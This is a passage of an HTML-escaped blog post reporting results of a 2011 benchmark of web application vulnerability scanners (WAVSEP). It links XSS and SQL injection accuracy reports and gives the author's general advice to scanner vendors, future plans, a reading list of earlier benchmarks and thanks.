115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report contains a comparison of advanced and uncommon scanner features:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%283%20of%203%29%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025808&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;20. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Detailed Results: Reflected XSS Detection Accuracy&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the Reflected Cross Site Scripting (RXSS) accuracy assessment are presented in the following report (the graphical results representation is provided in the beginning of the article):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20RXSS%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results that were taken into account only include vulnerable pages linked from the index-xss.jsp index page (the RXSS-GET and/or RXSS-POST directories, in addition to the RXSS-FalsePositive directory). XSS Vulnerable entry points in the SQL injection vulnerable pages were not taken into account, since they don’t necessarily represent a unique scenario (or at least, not until the “layered vulnerabilities” scenario will be implemented).&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025809&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;21. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Detailed Results: SQL Injection Detection Accuracy&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The overall results of the SQL Injection accuracy assessment are presented in the following report (the graphical results representation is provided in the beginning of the article):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025810&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;22. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Drilldown – Error Based SQL Injection Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the Error-Based SQL Injection benchmark are presented in the following report:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20Error-Based%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20Error-Based%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025811&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;23. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Drilldown – Blind &amp;amp; Time Based SQL Injection Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the Blind &amp;amp; Time based SQL Injection benchmarks are presented in the following report:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20Blind%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Web%20Application%20Scanner%20Blind%20SQLi%20Detection%20Accuracy%20-%20WAVSEP%20ScoreChart%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025812&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;24. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Technical Benchmark Conclusions – Vendors &amp;amp; Users&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;While testing the various tools in this benchmark, I dealt with numerous difficulties, witnessed many inconsistent results and noticed that some tools had difficulties optimizing their scanning features on the tested platform. I had however, dealt with the other end of the spectrum, and used tools the easily overcome most of the difficulties related to detecting the tested vulnerabilities. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I&#39;d like to share my conclusions, with the authors and vendors that are interested in improving their tools, and aren&#39;t offended by someone that&#39;s giving advice. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As far as detecting SQL injection exposures, I have noticed that tools that implemented the following features, detected more exposures, had less false positives, and provided consistent results:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Time based SQL Injection detection vectors are very effective. They are, however, very tricky to use, since they might be affected by other attacks that are simultaneously executed, or affect the detection of other tests in the same manner. As a result, I recommended to all the authors &amp;amp; vendors to implement the following behavior in their product: &lt;b&gt;execute time based attacks at the end of the scanning process, after all the rest of the tests are done, while using a reduced number of concurrent connections&lt;/b&gt;. Executing other tests in parallel might have a negative effect on the detection accuracy.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Since the upper/lower timeout values used to determine whether or not a time based exploit was successful may change due to various circumstances, I recommend calculating and re-calculating this value during the scan, and revalidating each time based result independently, after verifying that the timeout values are &quot;normal&quot;.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Implement various payloads of time based attacks – the sleep method is not enough to cover all the databases, and not even all the versions of mysql.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025813&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;25. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;So What Now?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So now that we have all those statistics, it&#39;s time to analyze them properly, and see which conclusions we can get to. Since this process will take time, I have to set some priorities;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;In the near future, I will try to achieve the following goals:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Find &lt;b&gt;a better way&lt;/b&gt; to present the vast amount of information on web application scanners features &amp;amp; accuracy. I have been struggling with this issue for almost 2 years, but I think that I finally found a solution that will make the information more useful for the common reader… stay tuned for updates.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Provide recommendations for the best current method of executing free &amp;amp; open source web application scanners; the most useful combinations, and the tiny tweaks required to achieve the best results. &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Release the new test case categories of WAVSEP that I have been working on. Yep, help needed.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;In addition to the short term goals, the following long term goals will still have a high priority:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Improve the testing framework (WAVSEP); add additional test cases and additional security vulnerabilities.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Perform additional benchmarks on the framework, and on a consistent basis. I previously aimed for &lt;b&gt;one major benchmark per year&lt;/b&gt;, but that formula might completely change, if I&#39;ll manage to work a few issues around a new initiative I have in this field. &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Integration with external frameworks for assessing crawling capabilities, technology support, etc.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Publish the results of tests against sample vulnerable web applications, so that some sort of feedback on other types of exposures will be available (until other types of vulnerabilities will be implemented in the framework), as well as features such as authentication support, crawling, etc.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Gradually develop a framework for testing additional related features, such as authentication support, malformed HTML tolerance, abnormal response support, etc.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I hope that this content will help the various vendors improve their tools, help pen-testers choose the right tool for each task, and in addition, help create some method of testing the numerous tools out there. &amp;nbsp;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Since I have already been in the situation in the past, then I know what&#39;s coming… &lt;b&gt;so I apologize in advance for any delays in my responses in the next few weeks.&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025814&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;26. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Recommended Reading List: Scanner Benchmarks&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following resources include additional information on previous benchmarks, comparisons and assessments in the field of web application vulnerability scanners:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;https://www.infosecisland.com/blogview/12935-Webapp-Scanner-Review-Acunetix-Versus-Netsparker.html&quot;&gt;Webapp Scanner Review: Acunetix versus Netsparker&quot;,&lt;/a&gt; by Mark Baldwin (commercial scanner comparison, April 2011)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://staff.science.uva.nl/%7Edelaat/sne-2010-2011/p27/report.pdf&quot;&gt;Effectiveness of Automated Application Penetration Testing Tools&lt;/a&gt;&quot;, by Alexandre Miguel Ferreira and Harald Kleppe (commercial &amp;amp; freeware scanner comparison, February 2011)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html&quot;&gt;Web Application Scanners Accuracy Assessment&lt;/a&gt;&quot;, the predecessor of the current benchmark, by Shay Chen (a comparison of 43 free &amp;amp; open source scanners, December 2010)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;https://www.owasp.org/images/2/28/Black_Box_Scanner_Presentation.pdf&quot;&gt;State of the Art: Automated Black-Box Web Application Vulnerability Testing&lt;/a&gt;&quot; (&lt;a href=&quot;http://theory.stanford.edu/%7Ejcm/papers/pci_oakland10.pdf&quot;&gt;Original Paper&lt;/a&gt;), by Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell (May 2010) – original paper&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.ntobjectives.com/files/Accuracy_and_Time_Costs_of_Web_App_Scanners.pdf&quot;&gt;Analyzing the Accuracy and Time Costs of Web Application Security Scanners&lt;/a&gt;&quot;, by Larry Suto (commercial scanners comparison, February 2010)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.cs.ucsb.edu/%7Eadoupe/static/black-box-scanners-dimva2010.pdf&quot;&gt;Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners&lt;/a&gt;&quot;, by Adam Doup´e, Marco Cova, Giovanni Vigna (commercial &amp;amp; open source scanner comparison, 2010)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.darknet.org.uk/content/files/WebVulnScanners.pdf&quot;&gt;Web Vulnerability Scanner Evaluation&lt;/a&gt;&quot;, by AnantaSec (commercial scanner comparison, January 2009)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://ha.ckers.org/files/CoverageOfWebAppScanners.zip&quot;&gt;Analyzing the Effectiveness and Coverage of Web Application Security Scanners&lt;/a&gt;&quot;, by Larry Suto (commercial scanners comparison, October 2007)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.informationweek.com/news/202201216&quot;&gt;Rolling Review: Web App Scanners Still Have Trouble with Ajax&lt;/a&gt;&quot;, by Jordan Wiens (commercial scanners comparison, October 2007)&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.virtualforge.de/whitepapers/web_scanner_benchmark.pdf&quot;&gt;Web Application Vulnerability Scanners – a Benchmark&lt;/a&gt;&quot; , by Andreas Wiegenstein, Frederik Weidemann, Dr. Markus Schumacher, Sebastian Schinzel (Anonymous scanners&amp;nbsp; comparison, October 2006)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025815&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;27. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Thank-You Note&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the research described in this article, I have received help from quite a few individuals and resources, and I’d like to take the opportunity to thank them all.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For all the &lt;b&gt;open source&lt;/b&gt; &lt;b&gt;tool authors&lt;/b&gt; that assisted me in testing the various tools in unreasonable late night hours, for the &lt;b&gt;kind souls&lt;/b&gt; that helped me obtain evaluation licenses for commercial products, for the &lt;b&gt;QA, Support and Development teams&lt;/b&gt; of commercial vendors, which saved me tons of time and helped me overcome obstacles, and for the various individuals that helped me contact these vendors.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I would also like to continue my tradition, and thank all the information sources that helped me gather the list of scanners over the years, including (but not limited to) information security sources such as &lt;b&gt;PenTestIT&lt;/b&gt; (&lt;a href=&quot;http://www.pentestit.com/&quot;&gt;http://www.pentestit.com/&lt;/a&gt;), &lt;b&gt;Security Sh3ll&lt;/b&gt; (&lt;a href=&quot;http://security-sh3ll.blogspot.com/&quot;&gt;http://security-sh3ll.blogspot.com/&lt;/a&gt;), &lt;b&gt;NETpeas Toolswatch Service (&lt;/b&gt;&lt;a href=&quot;http://www.vulnerabilitydatabase.com/toolswatch/&quot;&gt;http://www.vulnerabilitydatabase.com/toolswatch/&lt;/a&gt;), &lt;b&gt;Darknet&lt;/b&gt; (&lt;a href=&quot;http://www.darknet.org.uk/&quot;&gt;http://www.darknet.org.uk/&lt;/a&gt;), &lt;b&gt;Packet Storm&lt;/b&gt; (&lt;a href=&quot;http://packetstormsecurity.org/&quot;&gt;http://packetstormsecurity.org/&lt;/a&gt;), &lt;b&gt;Help Net Security&lt;/b&gt; (&lt;a href=&quot;http://www.net-security.org/&quot;&gt;http://www.net-security.org/&lt;/a&gt;), &lt;b&gt;Astalavista&lt;/b&gt; (&lt;a 